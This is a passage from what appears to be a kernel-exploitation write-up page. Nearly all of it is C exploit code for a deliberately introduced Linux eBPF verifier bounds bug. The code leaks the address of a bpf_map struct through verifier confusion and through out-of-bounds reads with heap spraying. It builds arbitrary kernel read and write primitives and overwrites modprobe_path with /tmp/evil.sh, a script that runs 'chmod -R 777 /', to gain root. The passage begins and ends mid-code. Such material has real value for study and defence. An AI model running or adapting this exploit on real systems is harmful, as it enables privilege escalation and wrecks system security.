      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h3 id=&#34;leaks&#34;&gt;Leaks&lt;/h3&gt;
&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt;&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;546928317&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;546928317&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_adjust_ptr_min_max_vals.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-oob-read--heap-spray&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;376148295&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;376148295&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // After this call, r1&amp;#39;s min and max will be set to imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, &amp;#39;a&amp;#39;, 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
